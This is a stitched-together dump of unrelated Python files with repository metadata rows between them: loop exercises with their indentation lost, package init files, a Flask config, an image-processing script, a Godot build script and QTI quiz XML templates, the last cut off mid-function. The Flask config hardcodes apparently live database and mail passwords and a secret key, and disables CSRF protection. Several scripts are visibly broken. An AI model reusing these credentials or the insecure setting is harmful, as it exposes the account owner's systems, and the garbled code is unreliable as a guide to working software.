#1) Write a function, sublist, that takes in a list of numbers as the parameter. In the function, use a while loop to return a sublist of the input list.
# The sublist should contain the same values of the original list up until it reaches the number 5 (it should not contain the number 5).
def sublist(input_lst):
out_lst = list()
number = 0
i = 0
print(input_lst)
print(len(input_lst))
length = len(input_lst)
while i<length:
number = input_lst[i]
i+=1
if number==5: break
else : out_lst.append(number)
print(out_lst)
return out_lst
#2) Write a function called check_nums that takes a list as its parameter, and contains a while loop that only stops once the element of the
# list is the number 7. What is returned is a list of all of the numbers up until it reaches 7.
def check_nums(input_lst):
out_lst = list()
number = 0
i = 0
print(input_lst)
print(len(input_lst))
length = len(input_lst)
while i<length:
number = input_lst[i]
i+=1
if number==7: break
else : out_lst.append(number)
print(out_lst)
return out_lst
#3) Write a function, sublist, that takes in a list of strings as the parameter. In the function, use a while loop to return a sublist of the input list.
# The sublist should contain the same values of the original list up until it reaches the string “STOP” (it should not contain the string “STOP”).
def sublist(in_lst):
out_list = list()
str = ""
i = 0
while str!="STOP":
str = in_lst[i]
i+=1
if str=="STOP": break
else: out_list.append(str)
return out_list
#4) Write a function called stop_at_z that iterates through a list of strings. Using a while loop, append each string to a new list until the string that
# appears is “z”. The function should return the new list.
def stop_at_z(in_lst):
out_list = list()
str = ""
i = 0
while str!="z":
str = in_lst[i]
i+=1
if str=="z": break
else: out_list.append(str)
return out_list
#5) Below is a for loop that works. Underneath the for loop, rewrite the problem so that it does the same thing, but using a while loop instead of a for loop.
# Assign the accumulated total in the while loop code to the variable sum2. Once complete, sum2 should equal sum1.
lst = [65, 78, 21, 33]
length = len(lst)
i = 0
sum2 = 0
while i<length:
sum2 += lst[i]
i+=1
#6) Challenge: Write a function called beginning that takes a list as input and contains a while loop that only stops once the element of the list is the string ‘bye’.
# What is returned is a list that contains up to the first 10 strings, regardless of where the loop stops. (i.e., if it stops on the 32nd element, the first 10 are
# returned. If “bye” is the 5th element, the first 4 are returned.) If you want to make this even more of a challenge, do this without slicing
def beginning(in_list):
length = len(in_list)
out_lst = list()
i = 0
str = ""
while i<length:
str = in_list[i]
i+=1
if str=="bye" or i>10:
break
out_lst.append(str)
return out_lst
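# Quick sanity checks for the functions above (expected results in the
# comments; uncomment to run). Note that the second sublist definition shadows
# the first, so only the string version is callable at this point:
# print(check_nums([2, 4, 7, 9]))          # [2, 4]
# print(sublist(['a', 'b', 'STOP', 'c']))  # ['a', 'b']
# print(stop_at_z(['x', 'y', 'z', 'w']))   # ['x', 'y']
# print(beginning(['hi'] * 20 + ['bye']))  # the first 10 'hi' strings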
e6ddfeb2d231878165ecef38a814ab51e23d6978 | 412 | py | Python | enan/__init__.py | mizuno-group/enan | 3c9dbe60bebf98e384e858db56980928b5897775 | ["MIT"] | null | null | null | enan/__init__.py | mizuno-group/enan | 3c9dbe60bebf98e384e858db56980928b5897775 | ["MIT"] | null | null | null | enan/__init__.py | mizuno-group/enan | 3c9dbe60bebf98e384e858db56980928b5897775 | ["MIT"] | null | null | null
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 25 15:46:32 2019
@author: tadahaya
"""
from .binom import BT
from .connect import Connect
from .fet import FET
from .gsea import GSEA
from .ssgsea import ssGSEA
__copyright__ = 'Copyright (C) 2020 MIZUNO Tadahaya'
__version__ = '1.0.3'
__license__ = 'MIT'
__author__ = 'MIZUNO Tadahaya'
__author_email__ = 'tadahaya@gmail.com'
e6de80977f40faa2f17ffea735e4529c245402b4 | 320 | py | Python | app/helpers/__init__.py | Hacker-1202/Selfium | 7e798c23c9f24aacab6f6a485d6355f1045bc65c | ["MIT"] | 14 | 2021-11-05T11:27:25.000Z | 2022-02-28T02:04:32.000Z | app/helpers/__init__.py | CssHammer/Selfium | 7e798c23c9f24aacab6f6a485d6355f1045bc65c | ["MIT"] | 2 | 2022-01-24T22:00:44.000Z | 2022-01-31T13:13:27.000Z | app/helpers/__init__.py | CssHammer/Selfium | 7e798c23c9f24aacab6f6a485d6355f1045bc65c | ["MIT"] | 5 | 2022-01-02T13:33:17.000Z | 2022-02-26T13:09:50.000Z
"""
Selfium Helper Files
~~~~~~~~~~~~~~~~~~~
All Helper Files used in Selfium project;
:copyright: (c) 2021 - Caillou and ZeusHay;
:license: MIT, see LICENSE for more details.
"""
from .getUser import *
from .getGuild import *
from .params import *
from .notify import *
from .sendEmbed import *
from .isStaff import *
e6e3cdee410d18c73bf42cae95012d7ea773e4ae | 808 | py | Python | app/config/secure.py | mapeimapei/awesome-flask-webapp | d0474f447a41e9432a14f9110989166c6595f0fa | ["MIT"] | 2 | 2020-05-08T15:58:44.000Z | 2020-05-09T19:36:34.000Z | app/config/secure.py | mapeimapei/awesome-flask-webapp | d0474f447a41e9432a14f9110989166c6595f0fa | ["MIT"] | null | null | null | app/config/secure.py | mapeimapei/awesome-flask-webapp | d0474f447a41e9432a14f9110989166c6595f0fa | ["MIT"] | null | null | null
# -*- coding: utf-8 -*-
__author__ = '带土'
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:mapei123@127.0.0.1:3306/awesome'
SECRET_KEY = '\x88D\xf09\x91\x07\x98\x89\x87\x96\xa0A\xc68\xf9\xecJ:U\x17\xc5V\xbe\x8b\xef\xd7\xd8\xd3\xe6\x98*4'
# Email configuration
MAIL_SERVER = 'smtp.exmail.qq.com'
MAIL_PORT = 465
MAIL_USE_SSL = True
MAIL_USE_TSL = False
MAIL_USERNAME = 'hello@yushu.im'
MAIL_PASSWORD = 'Bmwzy1314520'
MAIL_SUBJECT_PREFIX = '[鱼书]'
MAIL_SENDER = '鱼书 <hello@yushu.im>'
# Enable recording of database query performance
SQLALCHEMY_RECORD_QUERIES = True
# Threshold (in seconds) for flagging slow queries
DATABASE_QUERY_TIMEOUT = 0.5
SQLALCHEMY_TRACK_MODIFICATIONS = True
WTF_CSRF_CHECK_DEFAULT = False
SQLALCHEMY_ECHO = True
from datetime import timedelta
REMEMBER_COOKIE_DURATION = timedelta(days=30)
PROXY_API = 'http://ip.yushu.im/get'
# PERMANENT_SESSION_LIFETIME = 3600
e6e91782ecbf3d082de6c4e80c1d94b9a36175e3 | 8,084 | py | Python | transform.py | latenite4/python3 | 30e367471ba48e5fc0fb07327b636fcb9959e3e0 | ["Apache-2.0"] | null | null | null | transform.py | latenite4/python3 | 30e367471ba48e5fc0fb07327b636fcb9959e3e0 | ["Apache-2.0"] | null | null | null | transform.py | latenite4/python3 | 30e367471ba48e5fc0fb07327b636fcb9959e3e0 | ["Apache-2.0"] | null | null | null
#!/usr/bin/python3
#program to parse png images and change images
# cmd: python3 transform.py
# you must have local input/ and output/ directories
#
# name: R. Melton
# date: 12/27/20
# cmdline: python transform.py cmd show image='city.png' --ulx=1 --uly=2 --brx=0 --bry=9
# python transform.py show city.png
# python transform.py blur city.png
from image import Image
import numpy as np
import time, os, argparse, string
#from tkinter import *
import imghdr
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
def adjust_brightness(image,factor):
#scale each value by some amount
x_pixels, y_pixels,num_channels = image.array.shape
new_im = Image(x_pixels=x_pixels,y_pixels=y_pixels,num_channels=num_channels)
for x in range(x_pixels):
for y in range(y_pixels):
for c in range(num_channels):
new_im.array[x,y,c] = image.array[x,y,c] * factor #non vectorized version
#vectorized version
# new_im.array = image.array * factor -# this is faster
return new_im
#adjust the contrast by increasing difference from user
#defined midpoint
def adjust_contrast(image, factor, mid=0.5):
x_pixels, y_pixels,num_channels = image.array.shape
new_im = Image(x_pixels=x_pixels,y_pixels=y_pixels,num_channels=num_channels)
for x in range(x_pixels):
for y in range(y_pixels):
for c in range(num_channels):
new_im.array[x,y,c] = (image.array[x,y,c] -mid)* factor + mid #non vectorized version
#vectorized version
# new_im.array = (image.array - mid) * factor + mid
return new_im
# blur and image
def blur(image, k_size):
#k_size is the number of pixels to use when doing the blur
#k_size=3 would be above and below and left neighbor, right neighbor pixels, and diagonal
#neighbor pixels.
im = Image(filename = image)
x_pixels, y_pixels,num_channels = im.array.shape
new_im = Image(x_pixels=x_pixels,y_pixels=y_pixels,num_channels=num_channels)
neighbor_range = k_size // 2
for x in range(x_pixels):
for y in range(y_pixels):
for c in range(num_channels):
total = 0
for x_i in range(max(0,x-neighbor_range), min(new_im.x_pixels-1, x+neighbor_range)+1):
for y_i in range(max(0,y-neighbor_range), min(new_im.y_pixels-1, y+neighbor_range)+1):
total += image.array[x_i, y_i, c]
new_im.array[x,y,c] = total / (k_size **2) # average for kernel size in image
return new_im
def apply_kernel(image, kernel):
# the kernel should be a 2D array that represents the kernel we'll use!
# for the sake of simiplicity of this implementation, let's assume that the kernel is SQUARE
# for example the sobel x kernel (detecting horizontal edges) is as follows:
# [1 0 -1]
# [2 0 -2]
# [1 0 -1]
x_pixels, y_pixels, num_channels = image.array.shape # represents x, y pixels of image, # channels (R, G, B)
new_im = Image(x_pixels=x_pixels, y_pixels=y_pixels, num_channels=num_channels) # making a new array to copy values to!
neighbor_range = kernel.shape[0] // 2 # this is a variable that tells us how many neighbors we actually look at (ie for a 3x3 kernel, this value should be 1)
for x in range(x_pixels):
for y in range(y_pixels):
for c in range(num_channels):
total = 0
for x_i in range(max(0,x-neighbor_range), min(new_im.x_pixels-1, x+neighbor_range)+1):
for y_i in range(max(0,y-neighbor_range), min(new_im.y_pixels-1, y+neighbor_range)+1):
x_k = x_i + neighbor_range - x
y_k = y_i + neighbor_range - y
kernel_val = kernel[x_k, y_k]
total += image.array[x_i, y_i, c] * kernel_val
new_im.array[x, y, c] = total
return new_im
def combine_images(image1, image2):
# let's combine two images using the squared sum of squares: value = sqrt(value_1**2, value_2**2)
# size of image1 and image2 MUST be the same
x_pixels, y_pixels, num_channels = image1.array.shape # represents x, y pixels of image, # channels (R, G, B)
new_im = Image(x_pixels=x_pixels, y_pixels=y_pixels, num_channels=num_channels) # making a new array to copy values to!
for x in range(x_pixels):
for y in range(y_pixels):
for c in range(num_channels):
new_im.array[x, y, c] = (image1.array[x, y, c]**2 + image2.array[x, y, c]**2)**0.5
return new_im
def show_image(in_image):
path="input/"
img = mpimg.imread(path+in_image)
imgplot = plt.imshow(img)
plt.show()
# check for necessary parts of the runtime environment
def check_env( in_image):
#check to verify that output/input dirs exist:
path = './output/'
is_path = os.path.isdir(path)
if not is_path:
print('local ./output dir must exist, cannot continue...')
print(quit)
quit()
#verify output is writeable
is_w = os.access(path, os.W_OK)
if not is_w:
print('local ./output dir must be writeable, cannot continue...')
print(quit)
quit()
path = './input/'
is_path = os.path.isdir(path)
if not is_path:
print('local ./input dir must exist, cannot continue...')
print(quit)
quit()
#verify input image
if in_image:
thefile = 'input/'+in_image
print('file path: '+thefile)
is_file = os.path.isfile(thefile)
if not is_file:
print(f'local ./input file {in_image} must exist, cannot continue...')
print(quit)
quit()
if imghdr.what(thefile) != 'png':
print('wrong image file type, cannot continue...')
print(quit)
quit()
def cmd():
print("routine cmd")
# setup command line args and parms
# optional args have --
# fixed (required args do not have --)
def arg_init():
parser = argparse.ArgumentParser(description='Process an image.')
parser.add_argument("cmd",help="command to this program",type=str)
parser.add_argument("image",help="input image name for the command",type=str)
parser.add_argument("--ulx",action='store_true',help="upperleft x in image")
parser.add_argument("--uly",action='store_true',help="upperleft y in image")
parser.add_argument("--brx",action='store_true',help="bottomright x in image")
parser.add_argument("--bry",action='store_true',help="bottomright y in image")
group = parser.add_mutually_exclusive_group()
group.add_argument('--v', action='store_true',help="add more text output")
group.add_argument('--q', action='store_true',help="minimal output")
args = parser.parse_args()
print(args.image)
#if args.cmd != "show" and args.cmd != "blur":
return args
#def show_image(filename):
if __name__ == '__main__':
args = arg_init()
check_env(args.image)
lake = Image(filename = 'lake.png')
city = Image(filename='city.png')
start_time = time.time()
# brightened_im = adjust_brightness(lake, 1.7)
# brightened_im.write_image('brightened.png')
# darkened_im = adjust_brightness(lake, 0.3)
# darkened_im.write_image('darkened.png')
# incr_contrast = adjust_contrast(lake, 2,0.5)
# incr_contrast.write_image('incr_contrast.png')
# decr_contrast = adjust_contrast(lake, 0.5,0.5)
# decr_contrast.write_image('decr_contrast.png')
# blur_3 = blur(city,3)
# blur_3.write_image('blur_k3.png')
# blur_15 = blur(city,15)
# blur_15.write_image('blur_k15.png')
# let's apply a sobel kernel on the x and y axis
# sobel_x = apply_kernel(city, np.array([[1, 2, 1], [0, 0, 0], [-1, -2, -1]]))
# sobel_x.write_image('edge_x.png')
# sobel_y = apply_kernel(city, np.array([[1, 0, -1], [2, 0, -2], [1, 0, -1]]))
# sobel_y.write_image('edge_y.png')
# # this will show x and y edges
# sobel_xy = combine_images(sobel_x, sobel_y)
# sobel_xy.write_image('edge_xy.png')
if args.cmd == "show" and args.image:
show_image(args.image)
if args.cmd == "blur" and args.image:
blur_15 = blur(args.image,15)
blur_15.write_image(args.image+'blur_k15.png')
show_image(blur_k15.png)
if args.v:
print(f'total execution duration: {time.time() - start_time}s')
| 35.30131 | 162 | 0.671326 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,569 | 0.441489 |
e6fab2043b0b6fa907bee5da86873ddbf2cfe3cf | 1,432 | py | Python | platform/server/detect.py | leyyin/godot | 68325d7254db711beaedddad218e2cddb405c42c | ["CC-BY-3.0", "MIT"] | 24 | 2016-10-14T16:54:01.000Z | 2022-01-15T06:39:17.000Z | platform/server/detect.py | leyyin/godot | 68325d7254db711beaedddad218e2cddb405c42c | ["CC-BY-3.0", "MIT"] | 17 | 2016-12-30T14:35:53.000Z | 2017-03-07T21:07:50.000Z | platform/server/detect.py | leyyin/godot | 68325d7254db711beaedddad218e2cddb405c42c | ["CC-BY-3.0", "MIT"] | 9 | 2017-08-04T12:00:16.000Z | 2021-12-10T06:48:28.000Z
import os
import sys
def is_active():
return True
def get_name():
return "Server"
def can_build():
if (os.name!="posix"):
return False
return True # enabled
def get_opts():
return [
('use_llvm','Use llvm compiler','no'),
('force_32_bits','Force 32 bits binary','no')
]
def get_flags():
return [
('builtin_zlib', 'no'),
]
def configure(env):
env.Append(CPPPATH=['#platform/server'])
if (env["use_llvm"]=="yes"):
env["CC"]="clang"
env["CXX"]="clang++"
env["LD"]="clang++"
if (env["colored"]=="yes"):
if sys.stdout.isatty():
env.Append(CXXFLAGS=["-fcolor-diagnostics"])
is64=sys.maxsize > 2**32
if (env["bits"]=="default"):
if (is64):
env["bits"]="64"
else:
env["bits"]="32"
#if (env["tools"]=="no"):
# #no tools suffix
# env['OBJSUFFIX'] = ".nt"+env['OBJSUFFIX']
# env['LIBSUFFIX'] = ".nt"+env['LIBSUFFIX']
if (env["target"]=="release"):
env.Append(CCFLAGS=['-O2','-ffast-math','-fomit-frame-pointer'])
elif (env["target"]=="release_debug"):
env.Append(CCFLAGS=['-O2','-ffast-math','-DDEBUG_ENABLED'])
elif (env["target"]=="debug"):
env.Append(CCFLAGS=['-g2', '-Wall','-DDEBUG_ENABLED','-DDEBUG_MEMORY_ENABLED'])
env.Append(CPPFLAGS=['-DSERVER_ENABLED','-DUNIX_ENABLED'])
env.Append(LIBS=['pthread','z']) #TODO detect linux/BSD!
if (env["CXX"]=="clang++"):
env.Append(CPPFLAGS=['-DTYPED_METHOD_BIND'])
env["CC"]="clang"
env["LD"]="clang++"
e6fe636ebee73df95de2568536aed7f6f3927fad | 458 | py | Python | src/nn/dataset_utils/types_processing.py | sola-st/Nalin | 3a6f95cec95d9152a65af970cfbb145179b0bd72 | ["MIT"] | null | null | null | src/nn/dataset_utils/types_processing.py | sola-st/Nalin | 3a6f95cec95d9152a65af970cfbb145179b0bd72 | ["MIT"] | null | null | null | src/nn/dataset_utils/types_processing.py | sola-st/Nalin | 3a6f95cec95d9152a65af970cfbb145179b0bd72 | ["MIT"] | null | null | null
"""
Created on 17-June-2020
@author Jibesh Patra
The types extracted during runtime usually look something like --> <class 'numpy.ndarray'> or
<class 'seaborn.palettes._ColorPalette'> change them to --> ndarray, ColorPalette
"""
import re
remove_chars = re.compile(r'>|\'|<|(class )|_|(type)')
def process_types(tp: str) -> str:
cleaned_type = remove_chars.sub('', tp)
cleaned_type = cleaned_type.split('.')[-1].strip()
return cleaned_type
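# Example behavior (doctest-style, following the regex above):
#   process_types("<class 'numpy.ndarray'>")                  -> 'ndarray'
#   process_types("<class 'seaborn.palettes._ColorPalette'>") -> 'ColorPalette'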
fc070f80801a319fdf697b23e027ce45aa2d558c | 26,632 | py | Python | text2cc/xml_assessment.py | dlehman83/text2cc | 303798993590bceaeb5238a6cce82893c37cdfc7 | ["BSD-3-Clause"] | 1 | 2021-02-12T09:34:07.000Z | 2021-02-12T09:34:07.000Z | text2cc/xml_assessment.py | dlehman83/text2cc | 303798993590bceaeb5238a6cce82893c37cdfc7 | ["BSD-3-Clause"] | null | null | null | text2cc/xml_assessment.py | dlehman83/text2cc | 303798993590bceaeb5238a6cce82893c37cdfc7 | ["BSD-3-Clause"] | null | null | null
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021, Dana Lehman
# Copyright (c) 2020, Geoffrey M. Poore
# All rights reserved.
#
# Licensed under the BSD 3-Clause License:
# http://opensource.org/licenses/BSD-3-Clause
#
from .quiz import Quiz, Question, GroupStart, GroupEnd, TextRegion
BEFORE_ITEMS = '''\
<?xml version="1.0" encoding="UTF-8"?>
<questestinterop xmlns="http://www.imsglobal.org/xsd/ims_qtiasiv1p2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.imsglobal.org/xsd/ims_qtiasiv1p2 http://www.imsglobal.org/profile/cc/ccv1p2/ccv1p2_qtiasiv1p2p1_v1p0.xsd">
<assessment ident="{assessment_identifier}" title="{title}">
<qtimetadata>
<qtimetadatafield>
<fieldlabel>cc_maxattempts</fieldlabel>
<fieldentry>1</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>
cc_profile
</fieldlabel>
<fieldentry>
cc.exam.v0p1
</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>
qmd_assessmenttype
</fieldlabel>
<fieldentry>
Examination
</fieldentry>
</qtimetadatafield>
</qtimetadata>
<section ident="root_section">
'''
AFTER_ITEMS = '''\
</section>
</assessment>
</questestinterop>
'''
GROUP_START = '''\
<section ident="{ident}" title="{group_title}">
<selection_ordering>
<selection>
<selection_number>{pick}</selection_number>
<selection_extension>
<points_per_item>{points_per_item}</points_per_item>
</selection_extension>
</selection>
</selection_ordering>
'''
GROUP_END = '''\
</section>
'''
TEXT = '''\
<item ident="{ident}" title="{text_title_xml}">
<itemmetadata>
<qtimetadata>
<qtimetadatafield>
<fieldlabel>cc_profile</fieldlabel>
<fieldentry>text_only_question</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>points_possible</fieldlabel>
<fieldentry>0</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>original_answer_ids</fieldlabel>
<fieldentry></fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>assessment_question_identifierref</fieldlabel>
<fieldentry>{assessment_question_identifierref}</fieldentry>
</qtimetadatafield>
</qtimetadata>
</itemmetadata>
<presentation>
<material>
<mattext texttype="text/html">{text_html_xml}</mattext>
</material>
</presentation>
</item>
'''
START_ITEM = '''\
<item ident="{question_identifier}" title="{question_title}">
'''
END_ITEM = '''\
</item>
'''
ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM = '''\
<itemmetadata>
<qtimetadata>
<qtimetadatafield>
<fieldlabel>cc_profile</fieldlabel>
<fieldentry>{question_type}</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>points_possible</fieldlabel>
<fieldentry>{points_possible}</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>original_answer_ids</fieldlabel>
<fieldentry>{original_answer_ids}</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>assessment_question_identifierref</fieldlabel>
<fieldentry>{assessment_question_identifierref}</fieldentry>
</qtimetadatafield>
</qtimetadata>
</itemmetadata>
'''
ITEM_METADATA_ESSAY = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM.replace('{original_answer_ids}', '')
ITEM_METADATA_UPLOAD = ITEM_METADATA_ESSAY
ITEM_PRESENTATION_MCTF = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
<response_lid ident="response1" rcardinality="Single">
<render_choice>
{choices}
</render_choice>
</response_lid>
</presentation>
'''
ITEM_PRESENTATION_MCTF_CHOICE = '''\
<response_label ident="{ident}">
<material>
<mattext texttype="text/html">{choice_html_xml}</mattext>
</material>
</response_label>'''
ITEM_PRESENTATION_MULTANS = ITEM_PRESENTATION_MCTF.replace('Single', 'Multiple')
ITEM_PRESENTATION_MULTANS_CHOICE = ITEM_PRESENTATION_MCTF_CHOICE
ITEM_PRESENTATION_SHORTANS = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
<response_str ident="response1" rcardinality="Single">
<render_fib>
<response_label ident="answer1" rshuffle="No"/>
</render_fib>
</response_str>
</presentation>
'''
ITEM_PRESENTATION_ESSAY = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
<response_str ident="response1" rcardinality="Single">
<render_fib>
<response_label ident="answer1" rshuffle="No"/>
</render_fib>
</response_str>
</presentation>
'''
ITEM_PRESENTATION_UPLOAD = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
</presentation>
'''
ITEM_PRESENTATION_NUM = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
<response_str ident="response1" rcardinality="Single">
<render_fib fibtype="Decimal">
<response_label ident="answer1"/>
</render_fib>
</response_str>
</presentation>
'''
ITEM_RESPROCESSING_START = '''\
<resprocessing>
<outcomes>
<decvar maxvalue="100" minvalue="0" varname="SCORE" vartype="Decimal"/>
</outcomes>
'''
ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK = '''\
<respcondition continue="Yes">
<conditionvar>
<other/>
</conditionvar>
<displayfeedback feedbacktype="Response" linkrefid="general_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK = '''\
<respcondition continue="Yes">
<conditionvar>
<varequal respident="response1">{ident}</varequal>
</conditionvar>
<displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<varequal respident="response1">{ident}</varequal>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<varequal respident="response1">{ident}</varequal>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK = '''\
<respcondition continue="Yes">
<conditionvar>
<other/>
</conditionvar>
<displayfeedback feedbacktype="Response" linkrefid="general_incorrect_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK = '''\
<respcondition continue="Yes">
<conditionvar>
<varequal respident="response1">{answer_xml}</varequal>
</conditionvar>
<displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
{varequal}
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
{varequal}
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL = '''\
<varequal respident="response1">{answer_xml}</varequal>'''
ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK
ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK = ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<and>
{varequal}
</and>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<and>
{varequal}
</and>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT = '''\
<varequal respident="response1">{ident}</varequal>'''
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT = '''\
<not>
<varequal respident="response1">{ident}</varequal>
</not>'''
ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK
ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<vargte respident="response1">{num_min}</vargte>
<varlte respident="response1">{num_max}</varlte>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<vargte respident="response1">{num_min}</vargte>
<varlte respident="response1">{num_max}</varlte>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<or>
<varequal respident="response1">{num_exact}</varequal>
<and>
<vargte respident="response1">{num_min}</vargte>
<varlte respident="response1">{num_max}</varlte>
</and>
</or>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<or>
<varequal respident="response1">{num_exact}</varequal>
<and>
<vargte respident="response1">{num_min}</vargte>
<varlte respident="response1">{num_max}</varlte>
</and>
</or>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK
ITEM_RESPROCESSING_ESSAY = '''\
<respcondition continue="No">
<conditionvar>
<other/>
</conditionvar>
</respcondition>
'''
ITEM_RESPROCESSING_END = '''\
</resprocessing>
'''
ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL = '''\
<itemfeedback ident="general_fb">
<flow_mat>
<material>
<mattext texttype="text/html">{feedback}</mattext>
</material>
</flow_mat>
</itemfeedback>
'''
ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT = '''\
<itemfeedback ident="correct_fb">
<flow_mat>
<material>
<mattext texttype="text/html">{feedback}</mattext>
</material>
</flow_mat>
</itemfeedback>
'''
ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT = '''\
<itemfeedback ident="general_incorrect_fb">
<flow_mat>
<material>
<mattext texttype="text/html">{feedback}</mattext>
</material>
</flow_mat>
</itemfeedback>
'''
ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL = '''\
<itemfeedback ident="{ident}_fb">
<flow_mat>
<material>
<mattext texttype="text/html">{feedback}</mattext>
</material>
</flow_mat>
</itemfeedback>
'''
def assessment(*, quiz: Quiz, assessment_identifier: str, title_xml: str) -> str:
'''
Generate assessment XML from Quiz.
'''
xml = []
xml.append(BEFORE_ITEMS.format(assessment_identifier=assessment_identifier,
title=title_xml))
for question_or_delim in quiz.questions_and_delims:
if isinstance(question_or_delim, TextRegion):
xml.append(TEXT.format(ident=f'text2qti_text_{question_or_delim.id}',
text_title_xml=question_or_delim.title_xml,
assessment_question_identifierref=f'text2qti_question_ref_{question_or_delim.id}',
text_html_xml=question_or_delim.text_html_xml))
continue
if isinstance(question_or_delim, GroupStart):
xml.append(GROUP_START.format(ident=f'text2qti_group_{question_or_delim.group.id}',
group_title=question_or_delim.group.title_xml,
pick=question_or_delim.group.pick,
points_per_item=question_or_delim.group.points_per_question))
continue
if isinstance(question_or_delim, GroupEnd):
xml.append(GROUP_END)
continue
if not isinstance(question_or_delim, Question):
raise TypeError
question = question_or_delim
xml.append(START_ITEM.format(question_identifier=f'text2qti_question_{question.id}',
question_title=question.title_xml))
if question.type in ('true_false_question', 'multiple_choice_question',
